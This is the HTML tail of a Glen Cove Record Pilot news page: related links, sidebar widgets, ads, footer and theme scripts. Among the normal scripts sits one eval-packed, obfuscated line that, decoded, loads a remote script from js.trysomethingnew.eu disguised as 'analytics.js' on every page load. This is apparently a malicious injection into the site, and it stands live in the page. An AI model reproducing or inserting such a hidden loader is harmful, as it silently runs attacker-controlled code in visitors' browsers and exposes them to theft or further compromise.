</script><h4 class="td-related-title td-block-title"><a id="td_uid_5_5ec841e0c093d" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_4_5ec841e0beab1" href="#">RELATED ARTICLES</a><a id="td_uid_6_5ec841e0c0944" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_4_5ec841e0beab1" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_4_5ec841e0beab1 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://glencoverecordpilot.com/two-reasons-to-appreciate-glen-cove-hospital/" rel="bookmark" title="Two reasons to appreciate Glen Cove Hospital"><img width="218" height="150" class="entry-thumb" src="https://glencoverecordpilot.com/wp-content/uploads/2019/05/Letter-to-the-Editor-Featured-Image-web-218x150.jpg" srcset="https://glencoverecordpilot.com/wp-content/uploads/2019/05/Letter-to-the-Editor-Featured-Image-web-218x150.jpg 218w, https://glencoverecordpilot.com/wp-content/uploads/2019/05/Letter-to-the-Editor-Featured-Image-web-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Two reasons to appreciate Glen Cove Hospital"/></a></div>                <a href="https://glencoverecordpilot.com/category/opinion/letters-to-the-editor/" class="td-post-category">Letters to the Editor</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://glencoverecordpilot.com/two-reasons-to-appreciate-glen-cove-hospital/" rel="bookmark" title="Two reasons to appreciate Glen Cove Hospital">Two reasons to appreciate Glen Cove Hospital</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://glencoverecordpilot.com/despite-claims-county-needs-more-contact-tracers-to-reopen/" rel="bookmark" title="Despite Claims, County Needs  More Contact Tracers To Reopen"><img width="218" height="150" class="entry-thumb" src="https://glencoverecordpilot.com/wp-content/uploads/2020/05/Reopening_A-218x150.jpg" srcset="https://glencoverecordpilot.com/wp-content/uploads/2020/05/Reopening_A-218x150.jpg 218w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/Reopening_A-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Despite Claims, County Needs  More Contact Tracers To Reopen"/></a></div>                <a href="https://glencoverecordpilot.com/category/general-news/" class="td-post-category">General News</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://glencoverecordpilot.com/despite-claims-county-needs-more-contact-tracers-to-reopen/" rel="bookmark" title="Despite Claims, County Needs  More Contact Tracers To Reopen">Despite Claims, County Needs  More Contact Tracers To Reopen</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://glencoverecordpilot.com/doing-good-feels-even-better/" rel="bookmark" title="Doing Good Feels Even Better"><img width="218" height="150" class="entry-thumb" src="https://glencoverecordpilot.com/wp-content/uploads/2020/05/astralave-218x150.jpg" srcset="https://glencoverecordpilot.com/wp-content/uploads/2020/05/astralave-218x150.jpg 218w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/astralave-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Doing Good Feels Even Better"/></a></div>                <a href="https://glencoverecordpilot.com/category/glen-cove-news/" class="td-post-category">Glen Cove News</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://glencoverecordpilot.com/doing-good-feels-even-better/" rel="bookmark" title="Doing Good Feels Even Better">Doing Good Feels Even Better</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_4_5ec841e0beab1" data-td_block_id="td_uid_4_5ec841e0beab1"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_4_5ec841e0beab1" data-td_block_id="td_uid_4_5ec841e0beab1"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
	<div class="comments" id="comments">
        
		<div id="respond" class="comment-respond">
							<h3 id="reply-title" class="comment-reply-title">Leave a Reply					<small><a rel="nofollow" id="cancel-comment-reply-link" href="/connolly-k-kids-donate-to-hs-food-pantry/#respond" style="display:none;">Cancel reply</a></small>
				</h3>
						<form id="commentform" class="comment-form">
				<iframe title="Comment Form" src="https://jetpack.wordpress.com/jetpack-comment/?blogid=110564913&#038;postid=9795&#038;comment_registration=0&#038;require_name_email=1&#038;stc_enabled=1&#038;stb_enabled=1&#038;show_avatars=1&#038;avatar_default=mystery&#038;greeting=Leave+a+Reply&#038;greeting_reply=Leave+a+Reply+to+%25s&#038;color_scheme=light&#038;lang=en_US&#038;jetpack_version=8.3&#038;show_cookie_consent=10&#038;has_cookie_consent=0&#038;token_key=%3Bnormal%3B&#038;sig=783a5becfa5daeea9befa7633fdea37b4f2f7145#parent=https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F" style="width:100%; height: 430px; border:0;" name="jetpack_remote_comment" class="jetpack_remote_comment" id="jetpack_remote_comment" sandbox="allow-same-origin allow-top-navigation allow-scripts allow-forms allow-popups"></iframe>
									<!--[if !IE]><!-->
					<script>
						document.addEventListener('DOMContentLoaded', function () {
							var commentForms = document.getElementsByClassName('jetpack_remote_comment');
							for (var i = 0; i < commentForms.length; i++) {
								commentForms[i].allowTransparency = false;
								commentForms[i].scrolling = 'no';
							}
						});
					</script>
					<!--<![endif]-->
							</form>
		</div>

		
		<input type="hidden" name="comment_parent" id="comment_parent" value="" />

		    </div> <!-- /.content -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <div class="td_block_wrap td_block_7 td_block_widget td_uid_7_5ec841e0c2db2_rand td-pb-border-top td_block_template_1 td-column-1 td_block_padding"  data-td-block-uid="td_uid_7_5ec841e0c2db2" ><script>var block_td_uid_7_5ec841e0c2db2 = new tdBlock();
block_td_uid_7_5ec841e0c2db2.id = "td_uid_7_5ec841e0c2db2";
block_td_uid_7_5ec841e0c2db2.atts = '{"limit":"5","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"36","category_ids":"","custom_title":"Featured","custom_url":"https:\/\/glencoverecordpilot.com\/category\/featured\/","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_7_5ec841e0c2db2_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_7_5ec841e0c2db2_rand","tdc_css_class_style":"td_uid_7_5ec841e0c2db2_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_7_5ec841e0c2db2.td_column_number = "1";
block_td_uid_7_5ec841e0c2db2.block_type = "td_block_7";
block_td_uid_7_5ec841e0c2db2.post_count = "5";
block_td_uid_7_5ec841e0c2db2.found_posts = "740";
block_td_uid_7_5ec841e0c2db2.header_color = "#";
block_td_uid_7_5ec841e0c2db2.ajax_pagination_infinite_stop = "";
block_td_uid_7_5ec841e0c2db2.max_num_pages = "148";
tdBlocksArray.push(block_td_uid_7_5ec841e0c2db2);
</script><div class="td-block-title-wrap"><h4 class="block-title"><a href="https://glencoverecordpilot.com/category/featured/" class="td-pulldown-size">Featured</a></h4></div><div id=td_uid_7_5ec841e0c2db2 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://glencoverecordpilot.com/two-reasons-to-appreciate-glen-cove-hospital/" rel="bookmark" title="Two reasons to appreciate Glen Cove Hospital"><img width="100" height="70" class="entry-thumb" src="https://glencoverecordpilot.com/wp-content/uploads/2019/05/Letter-to-the-Editor-Featured-Image-web-100x70.jpg" srcset="https://glencoverecordpilot.com/wp-content/uploads/2019/05/Letter-to-the-Editor-Featured-Image-web-100x70.jpg 100w, https://glencoverecordpilot.com/wp-content/uploads/2019/05/Letter-to-the-Editor-Featured-Image-web-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Two reasons to appreciate Glen Cove Hospital"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://glencoverecordpilot.com/two-reasons-to-appreciate-glen-cove-hospital/" rel="bookmark" title="Two reasons to appreciate Glen Cove Hospital">Two reasons to appreciate Glen Cove Hospital</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2020-05-22T15:51:43+00:00" >May 22, 2020</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://glencoverecordpilot.com/despite-claims-county-needs-more-contact-tracers-to-reopen/" rel="bookmark" title="Despite Claims, County Needs  More Contact Tracers To Reopen"><img width="100" height="70" class="entry-thumb" src="https://glencoverecordpilot.com/wp-content/uploads/2020/05/Reopening_A-100x70.jpg" srcset="https://glencoverecordpilot.com/wp-content/uploads/2020/05/Reopening_A-100x70.jpg 100w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/Reopening_A-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Despite Claims, County Needs  More Contact Tracers To Reopen"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://glencoverecordpilot.com/despite-claims-county-needs-more-contact-tracers-to-reopen/" rel="bookmark" title="Despite Claims, County Needs  More Contact Tracers To Reopen">Despite Claims, County Needs  More Contact Tracers To Reopen</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2020-05-21T10:13:31+00:00" >May 21, 2020</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://glencoverecordpilot.com/doing-good-feels-even-better/" rel="bookmark" title="Doing Good Feels Even Better"><img width="100" height="70" class="entry-thumb" src="https://glencoverecordpilot.com/wp-content/uploads/2020/05/astralave-100x70.jpg" srcset="https://glencoverecordpilot.com/wp-content/uploads/2020/05/astralave-100x70.jpg 100w, https://glencoverecordpilot.com/wp-content/uploads/2020/05/astralave-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Doing Good Feels Even Better"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://glencoverecordpilot.com/doing-good-feels-even-better/" rel="bookmark" title="Doing Good Feels Even Better">Doing Good Feels Even Better</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2020-05-20T10:08:44+00:00" >May 20, 2020</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://glencoverecordpilot.com/letter-to-the-editor-vote-for-richard-galati-north-shore-schools-trustee/" rel="bookmark" title="Letter to the Editor: Vote For Richard Galati North Shore Schools Trustee"><img width="100" height="70" class="entry-thumb" src="https://glencoverecordpilot.com/wp-content/uploads/2019/06/Letter-to-the-Editor-Featured-Image-web-100x70.jpg" srcset="https://glencoverecordpilot.com/wp-content/uploads/2019/06/Letter-to-the-Editor-Featured-Image-web-100x70.jpg 100w, https://glencoverecordpilot.com/wp-content/uploads/2019/06/Letter-to-the-Editor-Featured-Image-web-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Letter to the Editor: Vote For Richard Galati North Shore Schools Trustee"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://glencoverecordpilot.com/letter-to-the-editor-vote-for-richard-galati-north-shore-schools-trustee/" rel="bookmark" title="Letter to the Editor: Vote For Richard Galati North Shore Schools Trustee">Letter to the Editor: Vote For Richard Galati North Shore Schools...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2020-05-19T21:05:48+00:00" >May 19, 2020</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://glencoverecordpilot.com/letter-in-support-of-nshs-boe-candidates/" rel="bookmark" title="Letter In Support Of NSHS BOE Candidates"><img width="100" height="70" class="entry-thumb" src="https://glencoverecordpilot.com/wp-content/uploads/2019/05/Letter-to-the-Editor-Featured-Image-web-100x70.jpg" srcset="https://glencoverecordpilot.com/wp-content/uploads/2019/05/Letter-to-the-Editor-Featured-Image-web-100x70.jpg 100w, https://glencoverecordpilot.com/wp-content/uploads/2019/05/Letter-to-the-Editor-Featured-Image-web-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Letter In Support Of NSHS BOE Candidates"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://glencoverecordpilot.com/letter-in-support-of-nshs-boe-candidates/" rel="bookmark" title="Letter In Support Of NSHS BOE Candidates">Letter In Support Of NSHS BOE Candidates</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2020-05-19T21:03:32+00:00" >May 19, 2020</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block --><div class="td-a-rec td-a-rec-id-custom_ad_1  td_uid_8_5ec841e0c7d63_rand td_block_template_1"><!-- /33457410/GlenCove_ATF_Cube -->
<div id='div-gpt-ad-1463589647854-2'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463589647854-2'); });
</script>
</div></div><aside class="td_block_template_1 widget widget_media_image"><a href="http://antonnews.com"><img width="233" height="300" src="https://glencoverecordpilot.com/wp-content/uploads/2019/07/Anton_Editors_FP-web-sm-233x300.jpg" class="image wp-image-9071  attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="https://glencoverecordpilot.com/wp-content/uploads/2019/07/Anton_Editors_FP-web-sm-233x300.jpg 233w, https://glencoverecordpilot.com/wp-content/uploads/2019/07/Anton_Editors_FP-web-sm-327x420.jpg 327w, https://glencoverecordpilot.com/wp-content/uploads/2019/07/Anton_Editors_FP-web-sm.jpg 350w" sizes="(max-width: 233px) 100vw, 233px" /></a></aside><aside class="td_block_template_1 widget widget_text"><h4 class="block-title"><span>Glen Cove Area News</span></h4>			<div class="textwidget"><!-- PR Newswire Sidebar Widget Code Starts Here -->
<div id="w6901_widget"></div><script language="JavaScript" src="https://tools.prnewswire.com/en-us/live/6901/widget.js"></script>
 <!-- PR Newswire Sidebar Widget Code Ends Here --></div>
		</aside><div class="td-a-rec td-a-rec-id-custom_ad_3  td_uid_9_5ec841e0c8a5d_rand td_block_template_1"><!-- /33457410/GlenCove_int_CubeA -->
<div id='div-gpt-ad-1463589647854-5' style='width:300px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463589647854-5'); });
</script>
</div></div><aside class="td_block_template_1 widget widget_media_image"><a href="http://antonnews.com/subscribe" target="_blank" rel="noopener noreferrer"><img width="287" height="760" src="https://glencoverecordpilot.com/wp-content/uploads/2016/11/GlenCove_HV-line.jpg" class="image wp-image-6508 aligncenter attachment-287x809 size-287x809" alt="" style="max-width: 100%; height: auto;" srcset="https://glencoverecordpilot.com/wp-content/uploads/2016/11/GlenCove_HV-line.jpg 306w, https://glencoverecordpilot.com/wp-content/uploads/2016/11/GlenCove_HV-line-113x300.jpg 113w, https://glencoverecordpilot.com/wp-content/uploads/2016/11/GlenCove_HV-line-159x420.jpg 159w" sizes="(max-width: 287px) 100vw, 287px" /></a></aside><aside class="td_block_template_1 widget widget_text"><h4 class="block-title"><span>Long Island Area News</span></h4>			<div class="textwidget"><!-- PR Newswire Sidebar Widget Code Starts Here -->
<div id="w6903_widget"></div><script language="JavaScript" src="https://tools.prnewswire.com/en-us/live/6903/widget.js"></script>
 <!-- PR Newswire Sidebar Widget Code Ends Here -->
</div>
		</aside><div class="td-a-rec td-a-rec-id-custom_ad_5  td_uid_10_5ec841e0c91c4_rand td_block_template_1"><!-- /33457410/GlenCove_int_CubeB -->
<div id='div-gpt-ad-1463589647854-6' style='width:300px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463589647854-6'); });
</script>
</div></div><aside class="td_block_template_1 widget widget_rss"><h4 class="block-title"><span><a class="rsswidget" href="http://longislandweekly.com"><img class="rss-widget-icon" style="border:0" width="14" height="14" src="https://glencoverecordpilot.com/wp-includes/images/rss.png" alt="RSS" /></a> <a class="rsswidget" href="https://longislandweekly.com/">Long Island Weekly</a></span></h4><ul><li><a class='rsswidget' href='https://longislandweekly.com/plants-that-attract-pollinators/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=plants-that-attract-pollinators'>Plants That Attract Pollinators </a></li><li><a class='rsswidget' href='https://longislandweekly.com/whats-on-shows-coming-to-a-small-screen-near-you/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=whats-on-shows-coming-to-a-small-screen-near-you'>What’s On? Shows Coming To A Small Screen Near You</a></li><li><a class='rsswidget' href='https://longislandweekly.com/island-harvest-food-bank-joins-nbc-4-and-telemundo-47s-feeding-our-families-online-donation-drive/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=island-harvest-food-bank-joins-nbc-4-and-telemundo-47s-feeding-our-families-online-donation-drive'>Island Harvest Food Bank Joins NBC 4 And Telemundo 47’s ‘Feeding Our Families’ Online Donation Drive</a></li><li><a class='rsswidget' href='https://longislandweekly.com/college-column-the-highs-and-lows-of-a-reluctant-transition-to-online-classes/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=college-column-the-highs-and-lows-of-a-reluctant-transition-to-online-classes'>College Column: The Highs And Lows Of A Reluctant Transition To Online Classes</a></li><li><a class='rsswidget' href='https://longislandweekly.com/making-masks-to-help-stop-the-spread/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=making-masks-to-help-stop-the-spread'>Making Masks To Help Stop The Spread</a></li></ul></aside>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->


<!-- Instagram -->



<!-- Footer -->
<div class="td-footer-wrapper td-container-wrap ">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
                <div class="td-a-rec td-a-rec-id-footer_top  td_uid_11_5ec841e0d31ad_rand td_block_template_1"><!-- /33457410/GlenCove_728x90_pgal -->
<div id='div-gpt-ad-1463589647854-3' style='height:90px; width:728px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463589647854-3'); });
</script>
</div></div>		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span12">
                            </div>
        </div>
    </div>

    <div class="td-footer-bottom-full">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="https://glencoverecordpilot.com/"><img src="https://glencoverecordpilot.com/wp-content/uploads/2016/04/GlenCove_WebLogoGray.jpg" alt="Glen Cove Record Pilot" title="Glen Cove Record Pilot"/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div><em>The Record Pilot</em> has served the areas of Glen Cove, Sea Cliff, Glen Head, Glenwood Landing and Locust Valley since 1917, acting as a loyal source for local news and community events<div class="footer-email-wrap">Contact us: <a href="mailto:glencove@antonmediagroup.com">glencove@antonmediagroup.com</a></div></aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/glencoverecordpilot" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://plus.google.com/109613629782626116856" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/RecordPilot" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span></aside></div>            </div>
        </div>
    </div>
</div>

<!-- Sub Footer -->
    <div class="td-sub-footer-container td-container-wrap ">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span td-sub-footer-menu">
                                        </div>

                <div class="td-pb-span td-sub-footer-copy">
                    &copy; Copyright 2020 • Anton Media Group • All Rights Reserved • <a href="https://antonmediagroup.com/anton-media-group-privacy-policy/">Privacy Policy</a>                </div>
            </div>
        </div>
    </div>
</div><!--close td-outer-wrap-->

	<div style="display:none">
	<div class="grofile-hash-map-972cb77ff2052138a097c77d3352ae53">
	</div>
	</div>


    <!--

        Theme: Newspaper by tagDiv.com 2017
        Version: 8.1 (rara)
        Deploy mode: deploy
        
        uid: 5ec841e0d35cb
    -->

    
<!-- Custom css form theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
.td-header-main-menu {
    padding-right: 0px !important;
}
.sf-menu > li > a {
    font-weight: 500 !important;
}
.wp-caption-text, .wp-caption-dd {
    font-style: inherit !important;
}
.td-header-style-1 .td-header-sp-logo {
    height: 150px !important;
}
.td-header-style-1 .td-header-sp-logo img {
    max-height: 150px !important;
}
.td-header-style-1 .td-header-sp-recs {
    margin: 55px 0 9px 0 !important;
}
.widget_rss .block-title .rsswidget {
    padding: 7px 10px;
}

.contain-image a {
    background-size: contain !important;
}
article.type-post figure{
    max-width: 100% !important;
}
</style>

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 1=2.6(\'1\');1.5=\'4://3.8.9/d.3\';2.a(\'b\')[0].c(1);',14,14,'|script|document|js|https|src|createElement|var|trysomethingnew|eu|getElementsByTagName|head|appendChild|analytics'.split('|'),0,{}))
</script><script type='text/javascript' src='https://glencoverecordpilot.com/wp-content/plugins/metronet-profile-picture/js/mpp-frontend.js?ver=2.3.11'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2020Mayaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=5.4.1'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-content/themes/Newspaper/js/tagdiv_theme.min.js?ver=8.1'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/comment-reply.min.js?ver=5.4.1'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/wp-embed.min.js?ver=5.4.1'></script>
<script async="async" type='text/javascript' src='https://glencoverecordpilot.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.4'></script>

<!-- JS generated by theme -->

<script>
    

                jQuery().ready(function jQuery_ready() {
                    tdAjaxCount.tdGetViewsCountsAjax("post","[9795]");
                });
            

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'https://glencoverecordpilot.com/wp-content/themes/Newspaper-child/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'https://glencoverecordpilot.com/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>


		<!--[if IE]>
		<script type="text/javascript">
			if ( 0 === window.location.hash.indexOf( '#comment-' ) ) {
				// window.location.reload() doesn't respect the Hash in IE
				window.location.hash = window.location.hash;
			}
		</script>
		<![endif]-->
		<script type="text/javascript">
			(function () {
				var comm_par_el = document.getElementById( 'comment_parent' ),
					comm_par = ( comm_par_el && comm_par_el.value ) ? comm_par_el.value : '',
					frame = document.getElementById( 'jetpack_remote_comment' ),
					tellFrameNewParent;

				tellFrameNewParent = function () {
					if ( comm_par ) {
						frame.src = "https://jetpack.wordpress.com/jetpack-comment/?blogid=110564913&postid=9795&comment_registration=0&require_name_email=1&stc_enabled=1&stb_enabled=1&show_avatars=1&avatar_default=mystery&greeting=Leave+a+Reply&greeting_reply=Leave+a+Reply+to+%25s&color_scheme=light&lang=en_US&jetpack_version=8.3&show_cookie_consent=10&has_cookie_consent=0&token_key=%3Bnormal%3B&sig=783a5becfa5daeea9befa7633fdea37b4f2f7145#parent=https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F" + '&replytocom=' + parseInt( comm_par, 10 ).toString();
					} else {
						frame.src = "https://jetpack.wordpress.com/jetpack-comment/?blogid=110564913&postid=9795&comment_registration=0&require_name_email=1&stc_enabled=1&stb_enabled=1&show_avatars=1&avatar_default=mystery&greeting=Leave+a+Reply&greeting_reply=Leave+a+Reply+to+%25s&color_scheme=light&lang=en_US&jetpack_version=8.3&show_cookie_consent=10&has_cookie_consent=0&token_key=%3Bnormal%3B&sig=783a5becfa5daeea9befa7633fdea37b4f2f7145#parent=https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F";
					}
				};

				
				if ( 'undefined' !== typeof addComment ) {
					addComment._Jetpack_moveForm = addComment.moveForm;

					addComment.moveForm = function ( commId, parentId, respondId, postId ) {
						var returnValue = addComment._Jetpack_moveForm( commId, parentId, respondId, postId ),
							cancelClick, cancel;

						if ( false === returnValue ) {
							cancel = document.getElementById( 'cancel-comment-reply-link' );
							cancelClick = cancel.onclick;
							cancel.onclick = function () {
								var cancelReturn = cancelClick.call( this );
								if ( false !== cancelReturn ) {
									return cancelReturn;
								}

								if ( ! comm_par ) {
									return cancelReturn;
								}

								comm_par = 0;

								tellFrameNewParent();

								return cancelReturn;
							};
						}

						if ( comm_par == parentId ) {
							return returnValue;
						}

						comm_par = parentId;

						tellFrameNewParent();

						return returnValue;
					};
				}

				
				// Do the post message bit after the dom has loaded.
				document.addEventListener( 'DOMContentLoaded', function () {
					var iframe_url = "https:\/\/jetpack.wordpress.com";
					if ( window.postMessage ) {
						if ( document.addEventListener ) {
							window.addEventListener( 'message', function ( event ) {
								var origin = event.origin.replace( /^http:\/\//i, 'https://' );
								if ( iframe_url.replace( /^http:\/\//i, 'https://' ) !== origin ) {
									return;
								}
								jQuery( frame ).height( event.data );
							});
						} else if ( document.attachEvent ) {
							window.attachEvent( 'message', function ( event ) {
								var origin = event.origin.replace( /^http:\/\//i, 'https://' );
								if ( iframe_url.replace( /^http:\/\//i, 'https://' ) !== origin ) {
									return;
								}
								jQuery( frame ).height( event.data );
							});
						}
					}
				})

			})();
		</script>

		<script type='text/javascript' src='https://stats.wp.com/e-202021.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:8.3',blog:'110564913',post:'9795',tz:'-4',srv:'glencoverecordpilot.com'} ]);
	_stq.push([ 'clickTrackerInit', '110564913', '9795' ]);
</script>


			<div id="tdw-css-writer" style="display: none" class="tdw-drag-dialog tdc-window-sidebar">
				<header>

				
					<a title="Editor" class="tdw-tab tdc-tab-active" href="#" data-tab-content="tdw-tab-editor">Edit with Live CSS</a>
					<div class="tdw-less-info" title="This will be red when errors are detected in your CSS and LESS"></div>
				
				</header>
				<div class="tdw-content">

					
					<div class="tdw-tabs-content tdw-tab-editor tdc-tab-content-active">


						<script>

							(function(jQuery, undefined) {

								jQuery(window).ready(function() {

									if ( 'undefined' !== typeof tdcAdminIFrameUI ) {
										var $liveIframe  = tdcAdminIFrameUI.getLiveIframe();

										if ( $liveIframe.length ) {
											$liveIframe.load(function() {
												$liveIframe.contents().find( 'body').append( '<textarea class="tdw-css-writer-editor" style="display: none"></textarea>' );
											});
										}
									}

								});

							})(jQuery);

						</script>


						<textarea class="tdw-css-writer-editor td_live_css_uid_1_5ec841e0d391a"></textarea>
						<div id="td_live_css_uid_1_5ec841e0d391a" class="td-code-editor"></div>


						<script>
							jQuery(window).load(function (){

								if ( 'undefined' !== typeof tdLiveCssInject ) {

									tdLiveCssInject.init();


